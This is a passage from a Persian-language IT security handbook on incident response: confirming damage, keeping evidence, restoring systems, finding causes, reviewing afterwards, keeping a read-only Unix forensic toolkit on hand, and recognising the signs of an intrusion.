‫ﻼ ﺍﮔﺮ ﻛﺎﺭﻣﻨﺪﻱ ﺭﺍ ﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺳﻴـﺴﺘﻢ‬‫ﻭﻗﺘﻲ ﻣﺸﻜﻞ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺍﻗﺪﺍﻡ ﺑﻪ ﻣﺤﺪﻭﺩﻛﺮﺩﻥ ﻳﺎ ﺧﺎﺗﻤﻪﺩﺍﺩﻥ ﺑﻪ ﺁﻥ ﻛﻨﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﺪ ﺷﻨﺎﺧﺘﻴﺪ‪ ،‬ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﻭ ﺭﺍ ﻏﻴﺮ ﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﻭ ﺍﻋﻤﺎﻝ ﺗﻨﺒﻴﻬﻲ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﺑﺮﺍﻱ ﻣﺤـﺪﻭﺩ‬
‫ﻛﺮﺩﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺍﺳﺖ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٤‬ﺍﺯ ﺩﺭﺳﺘﻲ ﺗﺸﺨﻴﺺ ﺧﻮﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﺎﻳﻴﺪ‬
‫ﺑﻌﺪ ﺍﺯ ﻣﻬﺎﺭ ﺻﺪﻣﺎﺕ‪ ،‬ﺗﺸﺨﻴﺺ ﺧﻮﺩ ﺍﺯ ﻣﺸﻜﻞ ﺭﺍ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻭ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ‪ .‬ﺁﻳﺎ ﺑﻌﺪ ﺍﺯ ﺍﺧـﺮﺍﺝ ﻛﺎﺭﻣﻨـﺪ ﻫﻨـﻮﺯ ﻫـﻢ‬
‫ﻓﺎﻳﻠﻬﺎ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ؟ ﺷﻤﺎ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺻﺪ ﺩﺭﺻﺪ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﻭﺍﻗﻌﻪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻧﺘﻮﺍﻧﻴﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺗﻤﺎﻡ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٥‬ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﺪﺍﺭﻙ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﮔﺮ ﻗﺼﺪ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺭﺧﺪﺍﺩ ﺭﺍ ﺩﺍﺭﻳﺪ ﻳﺎ ﺑﺪﻧﺒﺎﻝ ﺟﺒﺮﺍﻥ ﻗﺎﻧﻮﻧﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺁﻥ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ ﻋﻤـﻞ ﺩﻳﮕـﺮ ﺳـﻌﻲ ﺩﺭ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻻﺯﻡ ﻛﻨﻴﺪ‪ .‬ﻋﺪﻡ ﻣﻮﻓﻘﻴﺖ ﺩﺭ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻧﺒﺎﻳﺪ ﻣﺎﻧﻊ ﺍﺯ ﺗﻤﺎﺱ ﺷﻤﺎ ﺑﺎ ﭘﻠﻴﺲ ﻭ ﺗﺸﻜﻴﻞ ﭘﺮﻭﻧﺪﻩ ﻋﻠﻴﻪ ﻳﻚ ﻣﻈﻨﻮﻥ‬
‫ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻛﻤﺒﻮﺩ ﻣﺪﺍﺭﻙ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻧﺲ ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﭘﺎﻳﻴﻦ ﺁﻭﺭﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺣﻔﻆ ﻣﺪﺍﺭﻙ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺯﻣﺎﻧﮕﻴﺮ ﻭ ﻣﺸﻜﻞ ﺑﺎﺷﺪ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺳﺎﺩﻩ ﻫﻨﮕﺎﻡ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﺑﺎ ﻣﺸﻜﻼﺕ ﺑﻪ ﺍﻳﻦ ﻣﺆﻟﻔﻪ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ‬
‫ﻣﻲﺩﻫﻨﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٦‬ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﺮﻣﻴﻢ ﻛﻨﻴﺪ‬


‫ﻲ ﻭﺳﻌﺖ ﺧﺴﺎﺭﺗﻬﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﭘﺎﻳﺪﺍﺭ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺍﻳﻦ ﻋﻤﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺑـﻪ‬ ‫ﺑﻌﺪ ﺍﺯ ﺷﻨﺎﺳﺎﻳ ﹺ‬
‫ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﻘﻂ ﺑﻪ ﻣﻌﻨﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ‪ .‬ﻗﺒـﻞ ﺍﺯ‬
‫ﺍﺩﺍﻣﺔ ﻛﺎﺭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﻤﺎﻡ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺍﻣﻦ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺗﺮﻣﻴﻢ ﺷﻤﺎ ﺭﺍ ﺑﺎ ﻳﻚ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻫﻢ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﻭ ﻫﻢ ﺍﺯ ﺭﻭﻱ ﻧـﻮﺍﺭ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﭘﺎﻙ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٣٢‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٧‬ﺩﻟﻴﻞ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‬


‫ﺍﮔﺮ ﻣﺸﻜﻞ ﻧﺎﺷﻲ ﺍﺯ ﻳﻚ ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﻳﺎ ﻧﺎﺷﻲ ﺍﺯ ﻧﻘﺺ ﺩﺭ ﺗﺪﺍﺑﻴﺮ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﺷﻤﺎ ﺑﺎﺷﺪ‪ ،‬ﺑﻌﺪ ﺍﺯ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺳﻴﺴﺘﻢ ﺑـﻪ ﻭﺿـﻌﻴﺖ ﻋـﺎﺩﻱ‬
‫ﻻ ﺁﻣﻮﺯﺷـﻬﺎﻱ‬‫ﺑﺎﻳﺪ ﻳﻜﺴﺮﻱ ﺗﻐﻴﻴﺮﺍﺕ ﻭ ﺗﻌﻤﻴﺮﺍﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﺩﻟﻴﻞ ﻣﺸﻜﻞ‪ ،‬ﻳﻚ ﺷﺨﺺ ﺑﻮﺩﻩ ﻛﻪ ﺍﺷﺘﺒﺎﻫﻲ ﻣﺮﺗﻜﺐ ﻣﻲﺷـﺪﻩ‪ ،‬ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻻﺯﻡ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﻣﺠﺪﺩ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺭﺍ ﺑﻪ ﻭﻱ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺩ‪ ،‬ﻭ ﺍﮔﺮ ﻛﺴﻲ ﺍﺯ ﺭﻭﻱ ﻗﺼﺪ ﺩﺭ ﻛﺎﺭﻫﺎﻱ ﺷـﻤﺎ ﻣﺪﺍﺧﻠـﻪ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﻃﺮﻕ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴﻪ ﻭﻱ ﺍﻗﺪﺍﻡ ﻛﻨﻴﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٨‬ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‬


‫ﺍﮔﺮ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺣﻤﻠﻪ ﻣﺸﻤﻮﻝ ﺑﻴﻤﻪ ﺷﻮﺩ ﻗﺎﻋﺪﺗﹰﺎ ﺍﺩﻋﺎﻱ ﺧﺴﺎﺭﺕ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ‪ ،‬ﺑﺮﺍﻱ ﺗﻮﺿﻴﺢ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﺗﻔـﺎﻗﻲ‬
‫ﺍﻓﺘﺎﺩﻩ‪ ،‬ﭼﻪ ﻧﻔﻮﺫﻫﺎﻳﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻥ ﭼﻪ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‪ ،‬ﻛﻨﺘﺮﻝ ﺷﺎﻳﻌﺎﺕ ﻭ ﻣﺪﻳﺮﻳﺖ ﺭﻭﺍﺑﻂ ﺍﺟﺘﻤﺎﻋﻲ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﺍﻳﻦ‬
‫ﮔﺎﻡ ﺑﺮﺍﻱ ﺟﻮﺍﻣﻊ ﻧﺴﺒﺘﹰﺎ ﺑﺰﺭﮒ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺁﺛﺎﺭ ﺷﺎﻳﻌﺎﺕ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺧﻮﺩ ﺭﺧﺪﺍﺩ ﻣﻀﺮﺗﺮ ﺑﺎﺷﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٩‬ﭘﺲ ﺍﺯ ﺭﺧﺪﺍﺩ‪ ،‬ﻋﻤﻠﻜﺮﺩ ﺧﻮﺩ ﺭﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‬


‫ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﺯ ﺭﻓﻊ ﻣﺸﻜﻞ ﻣﻄﻤﺌﻦ ﺷﺪﻳﺪ‪ ،‬ﺑﺮﻭﺯ ﺭﺧﺪﺍﺩ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﺧﻮﺩ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺷﻤﺎ ﻭ ﺗﻴﻤﺘﺎﻥ ﭼﮕﻮﻧﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺴﺘﻴﺪ ﺑﻬﺘﺮ ﺑﻪ ﺁﻥ ﺭﺳﻴﺪﮔﻲ ﻛﻨﻴﺪ؟ ﭼﻪ ﺗﻼﺷﻬﺎﻳﻲ ﺑﻲﻧﺘﻴﺠﻪ ﻣﺎﻧﺪﻧﺪ؟ ﻛﺪﺍﻡ ﺗﺼﻤﻴﻤﺎﺕ ﺍﺷﺘﺒﺎﻩ ﺑﻮﺩﻧﺪ؟ ﻭ ﻣﻬﻤﺘﺮ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﺯ ﻫﻤﺎﻥ‬
‫ﺍﺑﺘﺪﺍ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺴﺘﻴﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺭﺧﺪﺍﺩ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟‬

‫ﻋﻼﻭﻩ ﺑﺮ ﻳﻚ ﻃﺮﺡ ﻋﻤﻠﻴﺎﺗﻲ‪ ،‬ﺑﺎ ﺩﺍﺷﺘﻦ ﻳﻚ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺭﻭﻱ ﻳﻚ ﺭﺳﺎﻧﺔ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ )ﻣﺜﻞ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ‪ ،‬ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ‪ ،‬ﻭ‪ (...‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺁﻣﺎﺩﮔﻲ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﻳﻜﺴﺮﻱ ﺑﺮﻧﺎﻣﺔ ﺩﺳﺘﻜﺎﺭﻱﻧﺸﺪﻩ ﺑﺮﺍﻱ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﺍﻗﻌـﻪ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺷـﻤﺎ ﻣـﻲﮔـﺬﺍﺭﺩ؛ ﭘـﺲ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺭﺍ ﻛﻪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺑـﺮﺍﻱ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫‪ Unix‬ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﻗﻼﻡ ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬

‫‪awk, bash, cat, compress, cut, dd, des, df, du, file, find, grep, gzip, icat, ifconfig, last, ls, lsmod,‬‬
‫‪lsof, md5sum, modinfo, more, netcat, netstat, nmap, paste, pcat, perl, pgp, pkginfo, ps, rpm, rm,‬‬
‫‪script, sed, strings, strace, tar, top, truss, uncompress, vi, and w.‬‬
‫ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ )ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺍﻳﺴﺘﺎ ﭘﻴﻮﻧﺪ ﻧﻤﺎﻳﻴﺪ(‪ .‬ﺩﺍﺷـﺘﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗﺎﺑـﻞ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺭﻭﻱ ﺁﻥ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ (http://www.knoppix.org) Knoppix‬ﻳﻚ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺩﻡ ﺩﺳﺘﻲ ﻣﻨﺎﺳﺐ ﻣﺒﺘﻨﻲ ﺑﺮ ‪Linux‬‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻭ ﺟﺮﻣﺸﻨﺎﺳﻲ ﻧﻴﺰ ﺑﻪ ﻫﻤﺮﺍﻩ ﺧﻮﺩ ﺩﺍﺭﺩ‪ .‬ﭼﻮﻥ ‪ Linux‬ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ FAT‬ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬
‫ﻭ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ‪ Unix‬ﺭﺍ ‪ mount‬ﻛﻨﺪ‪ ،‬ﻳﻚ ﺩﻳﺴﻚ ﻓﺸﺮﺩﺓ ‪ Knoppix‬ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪﻱ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﻛﺸﻒ ﻳﻚ ﺗﻬﺎﺟﻢ‬
‫ﭼﻨﺪ ﺣﺎﻟﺖ ﺑﺮﺍﻱ ﻣﻄﻠﻊﺷﺪﻥ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺍﺑﺮﻛـﺎﺭﺑﺮ ﺍﺯ ﻳـﻚ ﻛـﺎﻓﻲﻧـﺖ ﺩﺭ ﺑﻮﺩﺍﭘـﺴﺖ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﺪﻩ‪،‬‬ ‫ﻣﺠﺮﻡ ﺭﺍ ﺣﻴﻦ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻣﺜ ﹰ‬ ‫•‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﺷﻤﺎ ﺗﻨﻬﺎ ﻛﺴﻲ ﻫﺴﺘﻴﺪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩﻩ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺪﺍﻧﺪ؛‬
‫ﻼ ﻳﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺭﺥ ﺩﺍﺩﻩ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﻧﻔﻮﺫ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ‪ .‬ﻣﺜ ﹰ‬ ‫•‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻭﺟﻮﺩ ﻳﻚ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺩﺳﺖ ﻣﻲﺍﻧﺪﺍﺯﺩ‪ ،‬ﻳـﺎ ﺑـﺎ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺟﺪﻳـﺪﻱ‬
‫ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻳﺪ؛‬
‫ﭘﻴﻐﺎﻣﻲ ﺍﺯ ﺭﺍﻫﺒﺮ ﻳﻚ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻣﻲﮔﻮﻳﺪ ﺩﺭ ﺷﺒﻜﺔ ﻭﻱ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻋﺎﺩﻱ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ‬ ‫•‬
‫ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﺮﭼﺸﻤﻪ ﮔﺮﻓﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛‬
‫‪٤٣٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﺗﻔﺎﻗﺎﺕ ﻏﻴﺮﻋﺎﺩﻱ ﻣﻲﺑﻴﻨﻴﺪ‪ ،‬ﻣﺜﻞ ﻛﻨﺪﻱ ﺷـﺪﻳﺪ ﺷـﺒﻜﻪ‪ ،‬ﺧـﺮﺍﺏﺷـﺪﻧﻬﺎﻱ ﻧﺎﮔﻬـﺎﻧﻲ‪ ،‬ﻓﻌﺎﻟﻴـﺖ ﺷـﺪﻳﺪ ﺩﻳـﺴﻚ ﺳـﺨﺖ‪،‬‬ ‫•‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻳﻬﺎﻱ ﻣﺠﺪﺩ ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﻫﻴﭻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩ‪ ،‬ﻧﺎﻫﻤﺨﻮﺍﻧﻴﻬﺎﻱ ﺟﺰﺋﻲ ﺩﺭ ﻣﺤﺎﺳﺒﺎﺕ ﺯﻣﺎﻧﻬﺎﻱ ﺍﺗﺼﺎﻝ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﭘﺎﺳﺨﻬﺎﻱ ﺑـﺎ‬
‫ﺗﺄﺧﻴﺮ ﺯﻳﺎﺩ‪ ،‬ﻭ ‪. . .‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻠﻬﺎ ﻭ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﺑﺮﺍﻱ ﻛﺸﻒ ﻧﻔﻮﺫﻫﺎ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻄـﻮﺭ‬
‫ﻣﻨﻈﻢ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺼﻮﺭﺕ ﺧﺎﺭﺝ ﺍﺯ ﺭﻭﺍﻝ ﻋﺎﺩﻱ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻳﻚ ﻋﻨـﺼﺮ ﺗـﺼﺎﺩﻓﻲ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩﺍﻳـﺪ ﻛـﻪ ﻣـﺎﻧﻊ ﻣـﻲﺷـﻮﺩ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺯﻣﺎﻧﺒﻨﺪﻱ ﺷﻤﺎ ﺭﺩ ﭘﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ‪ .‬ﻫﻤﻴﻦ ﻧﻜﺘﺔ ﺳﺎﺩﻩ‪ ،‬ﻳﻚ ﺍﺻﻞ ﺩﺭ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺳـﺖ‪ :‬ﻫﻤـﻮﺍﺭﻩ‬
‫ﺳﻌﻲ ﻛﻨﻴﺪ ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﺑﺎﺷﻴﺪ‪.‬‬

‫ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻣﻬﺎﺟﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻳﺪ‬


‫ﻭﻗﺘﻲ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻛﺸﻒ ﻛﺮﺩﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺭﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪:‬‬
